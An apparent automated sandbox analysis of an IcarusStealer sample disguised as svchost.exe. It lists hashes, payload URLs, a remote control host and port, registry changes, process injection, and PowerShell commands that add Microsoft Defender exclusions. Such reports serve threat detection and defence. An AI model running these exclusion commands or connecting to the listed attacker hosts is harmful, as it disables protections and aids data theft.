Analysis
-
max time kernel
7s -
max time network
62s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
09/03/2024, 15:28
Static task
static1
Behavioral task
behavioral1
Sample
svchost.exe
Resource
win10v2004-20240226-en
General
-
Target
svchost.exe
-
Size
494KB
-
MD5
65c2533608f1aad7e7780b1b705f6717
-
SHA1
688bd80975cede811e57d3b1d197eae97ebc4bde
-
SHA256
ade93fc6c27fa1b57d864ebbcea4cec99bfb8556115496051bc8a10b0efde04d
-
SHA512
77c409d60f60eb55062175c16b955fe5b71e7eb4f438c781f60dc010f8b88cdd21d068c0295e937bd478ecc2c94179e30479565f6a87f092d16dadcbbdbc785b
-
SSDEEP
12288:ZoXzSuLut6N6LqQzJqkKAulc84bYBbuB1t4cWWzDKuVAccIpGNJ+QK:+uZ6N6LqQzJqkt
Malware Config
Extracted
icarusstealer
-
payload_url
https://blackhatsec.org/add.jpg
https://blackhatsec.org/remove.jpg
Signatures
-
IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation svchost.exe -
Executes dropped EXE 1 IoCs
pid Process 544 Start.exe -
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 17 raw.githubusercontent.com 18 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 34 ipinfo.io -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3368 set thread context of 220 3368 svchost.exe 99 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{506CF92D-2348-44C8-A7CA-5CFD619112B9} explorer.exe Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 3368 svchost.exe 3368 svchost.exe 3368 svchost.exe 544 Start.exe 544 Start.exe 2896 powershell.exe 2896 powershell.exe 3880 powershell.exe 3880 powershell.exe 544 Start.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 3368 svchost.exe Token: SeShutdownPrivilege 800 explorer.exe Token: SeCreatePagefilePrivilege 800 explorer.exe Token: SeShutdownPrivilege 800 explorer.exe Token: SeCreatePagefilePrivilege 800 explorer.exe Token: SeDebugPrivilege 220 cvtres.exe Token: SeShutdownPrivilege 800 explorer.exe Token: SeCreatePagefilePrivilege 800 explorer.exe Token: SeShutdownPrivilege 800 explorer.exe Token: SeCreatePagefilePrivilege 800 explorer.exe Token: SeShutdownPrivilege 800 explorer.exe Token: SeCreatePagefilePrivilege 800 explorer.exe Token: SeShutdownPrivilege 800 explorer.exe Token: SeCreatePagefilePrivilege 800 explorer.exe Token: SeShutdownPrivilege 800 explorer.exe Token: SeCreatePagefilePrivilege 800 explorer.exe Token: SeDebugPrivilege 544 Start.exe Token: SeDebugPrivilege 2896 powershell.exe Token: SeDebugPrivilege 3880 powershell.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 800 explorer.exe 800 explorer.exe 800 explorer.exe 800 explorer.exe 800 explorer.exe 800 explorer.exe -
Suspicious use of SendNotifyMessage 8 IoCs
pid Process 800 explorer.exe 800 explorer.exe 800 explorer.exe 800 explorer.exe 800 explorer.exe 800 explorer.exe 800 explorer.exe 800 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4036 StartMenuExperienceHost.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 3368 wrote to memory of 4472 3368 svchost.exe 95 PID 3368 wrote to memory of 4472 3368 svchost.exe 95 PID 3368 wrote to memory of 4472 3368 svchost.exe 95 PID 4472 wrote to memory of 2204 4472 csc.exe 96 PID 4472 wrote to memory of 2204 4472 csc.exe 96 PID 4472 wrote to memory of 2204 4472 csc.exe 96 PID 3368 wrote to memory of 800 3368 svchost.exe 97 PID 3368 wrote to memory of 800 3368 svchost.exe 97 PID 3368 wrote to memory of 2612 3368 svchost.exe 98 PID 3368 wrote to memory of 2612 3368 svchost.exe 98 PID 3368 wrote to memory of 2612 3368 svchost.exe 98 PID 3368 wrote to memory of 220 3368 svchost.exe 99 PID 3368 wrote to memory of 220 3368 svchost.exe 99 PID 3368 wrote to memory of 220 3368 svchost.exe 99 PID 3368 wrote to memory of 220 3368 svchost.exe 99 PID 3368 wrote to memory of 220 3368 svchost.exe 99 PID 3368 wrote to memory of 220 3368 svchost.exe 99 PID 3368 wrote to memory of 220 3368 svchost.exe 99 PID 3368 wrote to memory of 220 3368 svchost.exe 99 PID 3368 wrote to memory of 1660 3368 svchost.exe 102 PID 3368 wrote to memory of 1660 3368 svchost.exe 102 PID 3368 wrote to memory of 1660 3368 svchost.exe 102 PID 220 wrote to memory of 4644 220 cvtres.exe 101 PID 220 wrote to memory of 4644 220 cvtres.exe 101 PID 220 wrote to memory of 4644 220 cvtres.exe 101 PID 220 wrote to memory of 4076 220 cvtres.exe 106 PID 220 wrote to memory of 4076 220 cvtres.exe 106 PID 220 wrote to memory of 4076 220 cvtres.exe 106 PID 1660 wrote to memory of 544 1660 cmd.exe 108 PID 1660 wrote to memory of 544 1660 cmd.exe 108 PID 4644 wrote to memory of 3880 4644 cmd.exe 110 PID 4644 wrote to memory of 3880 4644 cmd.exe 110 PID 4644 wrote to memory of 3880 4644 cmd.exe 110 PID 4076 wrote to memory of 2896 4076 cmd.exe 109 PID 4076 wrote to memory of 2896 4076 cmd.exe 109 PID 4076 wrote to memory of 2896 4076 cmd.exe 109
Processes
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\20elnnae\20elnnae.cmdline"2⤵
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75FB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCADAA17DA99B940328E167AEB45BAC584.TMP"3⤵PID:2204
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:800
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 PUGlcQLxe2⤵PID:2612
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 PUGlcQLxe2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:220 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit3⤵
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3880
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit3⤵
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\Start.exe & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Users\Admin\AppData\Local\Temp\Start.exeC:\Users\Admin\AppData\Local\Temp\Start.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:4036
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4276
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4084
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:3004
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵PID:4724
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:712
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:5192
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:5624
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:6000
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
16KB
MD585f7b21f78ffcce8f30b0589ae6e1578
SHA114654f7fbc30e5e58d9bb6fa57360d3458fdc484
SHA256e1365c3babc0f5f8487ad855a43970d8dba206eb3fc6b01ab9132a5c5813629f
SHA51211ec10dc0eb87ea219b905f079c407eba390ec9b2c0399cb3f6e2014a0db2ac88c673b5d8a9b616338a3bdc4d2ed1dde432bf2fdae207210eca31dbcce4e15c1
-
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\1HCECE5V\microsoft.windows[1].xml
Filesize97B
MD56583a2f89cc3c90f77ffa922acf7ee63
SHA1eccd205c1bb4764f160e86cfd0d860976c32708f
SHA25634cbdb325cf0420e4bfbc19da431b639890b153b6ac0635ce79ba37ffc677ac2
SHA5120c7daec9157074607177f75d7ccf190027d9e1830d832cbf16426bfcf221258db4fba74ee35f20c85a9bd6022a1db0409a2f3ec84ecc7317142cf9759eead021
-
Filesize
1KB
MD5c94fa213d51f3046b4fee71f216be2fe
SHA1d4b4e1cd9d16184d2ff5d687c13f3915f5d97e51
SHA25652e15efb7ab936117b0424adf8df1ed4a0d346746097de7d525752d1cb455c0d
SHA51207963f3c03c6de7759d2043fb5b62313a0c056de8570dc1ae636a4f61f3c3c8f74279be90d941c485df1a5972a000921b1083a2b2ec5f303e6169d8bf158f8c8
-
Filesize
4KB
MD565553b8955e11c0813ae56b6502071fe
SHA148ca68eb75a01f6a5e4329addb9b5b4b7bf98b4c
SHA256647fffa6f573e913ec1f26b43fcf731e48e2d307f45f023c66d49d71240623f8
SHA512ca9403803be7c0b07c39a12faca0aa3043507c1adae4bafb570868a9e6f8548786222e3c3d4c8724ffec10011035fa354318857864a4b4c97701d5d9650ebef8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD514846c9faaef9299a1bf17730f20e4e6
SHA18083da995cfaa0e8e469780e32fcff1747850eb6
SHA25661bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1
-
Filesize
447B
MD580e5e8cec2758009460e985a799ca6b4
SHA189fc0e1ac64a3d23ee2e83086957e63dd5b7cd2e
SHA256ecedde26d1fb9ab58e2e3b8cfbb41514cd629c0e531049bc0c1b0ee402465595
SHA512becc050e4a07eec5710f59e371bd8653b0274f84e9323ac7509f6895fba6ad69c082deae3bd7ed68428a8b1487a016f3e169c846836c88c4c47eb52d3db110a2
-
Filesize
1KB
MD5810535a8ae563d6aa53635a1bb1206ff
SHA1f5ba39f1a455eb61efe5022b524892249ee75dce
SHA2567f2c2a29a5f1c0d994fa4c2fccc11a8f3f5f5d4d97ada18aea94971664c8992f
SHA5125662b39b29d33bff2e8de4cf3878a6e58b7a163cc93311f4c82f03e73b239a76bb9064ed0c4a6d01cceb858663462345cae78999cfa3668ef975cf85dfff138d